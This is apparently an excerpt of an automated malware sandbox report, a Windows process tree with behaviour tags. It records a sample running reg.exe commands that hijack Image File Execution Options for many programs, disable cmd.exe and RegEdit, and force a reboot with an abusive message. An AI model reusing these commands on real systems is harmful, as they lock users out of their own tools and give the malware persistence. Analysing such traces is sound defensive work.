PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4884
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:4056
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\plugin-hang-ui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:5928
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1632
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵PID:4620
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:6704
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5096
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD" /d "1" /t REG_DWORD /f3⤵
- Disables cmd.exe use via registry modification
PID:3032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger" /3⤵PID:5528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools" /d "1" /t REG_DWORD /f3⤵
- Disables RegEdit via registry modification
PID:3724
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 500 -c "FUCK YOU HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA"3⤵PID:3696
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc1⤵PID:5112
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5052
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:5584
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DevicesFlow -s DevicePickerUserSvc1⤵PID:236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc1⤵PID:2088
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1384
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1584
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:3540
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:5140
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding1⤵PID:5884
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵
- Modifies data under HKEY_USERS
PID:4980
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f8 0x4e81⤵PID:3816
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5788
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4892
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5428
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4292
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1060
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4360
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4604
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3828
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5788
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5296
-
C:\Windows\System32\DisplaySwitch.exeC:\Windows\System32\DisplaySwitch.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1832
-
C:\Windows\system32\dllhost.exeC:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}1⤵PID:4956
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6308
-
C:\Windows\System32\msdtc.exeC:\Windows\System32\msdtc.exe1⤵
- Modifies data under HKEY_USERS
PID:6684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv1⤵PID:3960
-
C:\Windows\system32\wlrmdr.exe-s -1 -f 2 -t You're about to be signed out -m FUCK YOU HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA -a 31⤵PID:412
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://sfdw.360safe.com/setup.exe2⤵PID:4004
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://sfdw.360safe.com/setup.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x308,0x7fff3e1df208,0x7fff3e1df214,0x7fff3e1df2204⤵PID:1336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1888,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:34⤵PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:24⤵PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2256,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:84⤵PID:6404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:14⤵PID:5764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3508,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:14⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4524,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4508 /prefetch:14⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4244,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:24⤵PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4292,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:24⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4264,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:14⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4992,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4956 /prefetch:14⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4324,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:24⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=4340,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:14⤵PID:7176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=4356,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:24⤵PID:7184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=3484,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:14⤵PID:7192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=4388,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:24⤵PID:7200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5800,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=3680 /prefetch:84⤵PID:7892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5844,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:84⤵PID:8056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3656,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:84⤵PID:7264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5760,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:84⤵PID:7272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6852,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=6876 /prefetch:84⤵PID:7664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6852,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=6876 /prefetch:84⤵PID:3804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7008,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7000 /prefetch:84⤵PID:8056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7016,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7032 /prefetch:84⤵PID:7732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7292,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7100 /prefetch:84⤵PID:8096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7316,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:84⤵PID:8132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7468,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7480 /prefetch:84⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7632,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:84⤵PID:8100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:84⤵PID:7804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4360,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:84⤵PID:8124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5000,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=6276 /prefetch:84⤵PID:5188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=6552 /prefetch:84⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6312,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=6716 /prefetch:84⤵PID:6160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5052,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:84⤵PID:3672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=3644,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=5252 /prefetch:14⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3772,i,7083072653681042532,456480143990162054,262144 --variations-seed-version --mojo-platform-channel-handle=1364 /prefetch:84⤵PID:8100
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵PID:4628
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6732
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:7900 -
